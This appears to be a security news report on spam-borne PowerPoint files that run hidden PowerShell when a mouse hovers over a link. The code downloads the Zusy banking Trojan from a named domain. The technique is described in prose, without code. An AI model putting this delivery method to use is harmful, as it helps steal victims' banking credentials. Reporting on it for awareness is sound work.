It’s not uncommon for cybercriminals to deliver malware to hack computers using specially crafted Microsoft Office files, particularly Word documents, attached to spam emails. These attacks typically rely on social engineering to trick the targeted user into enabling VBA macros embedded in the document.
Those malicious PowerPoint files are distributing a malware called ‘Zusy,’ a banking Trojan, that targets financial websites. These files, named “order.ppsx” or “invoice.ppsx,” have been distributed via spam emails with titles such as “Purchase Order #130527” and “Confirmation.”
Moreover, the malicious PowerShell code hidden inside the document triggers as soon as the victim moves/hovers a mouse over a link, which downloads an additional payload on the victim’s machine – even without clicking it.
When the malicious PowerPoint file is opened, it shows a screen with a single link that says “Loading…Please wait”:
When a user hovers the mouse over the link – even without clicking it, it causes PowerPoint to automatically execute the PowerShell code, an external program. However, the code doesn’t execute automatically as soon as the file is opened. The Protected View security feature that comes enabled by default in most supported versions of Office, including Office 2013 and Office 2010, displays a severe warning and prompts them to enable or disable the content.
If the user neglects this warning and allows the content to be viewed, the PowerShell code is executed and a domain named “cccn.nl” is contacted. A file is downloaded from this domain and executed, which is eventually responsible for the delivery of a new variant of the banking Trojan called Zusy, Tinba, and Tiny Banker.
The security researchers also pointed out that while the attack does not work if the malicious presentation is opened using PowerPoint Viewer, and most versions of Office warn the user before the code is executed, the method could still be efficient in some cases.
“Users might still somehow enable external programs because they’re lazy, in a hurry, or they’re only used to blocking macros. Also, some configurations may possibly be more permissive in executing external programs than they are with macros,” SentinelOne Labs said in a blog post.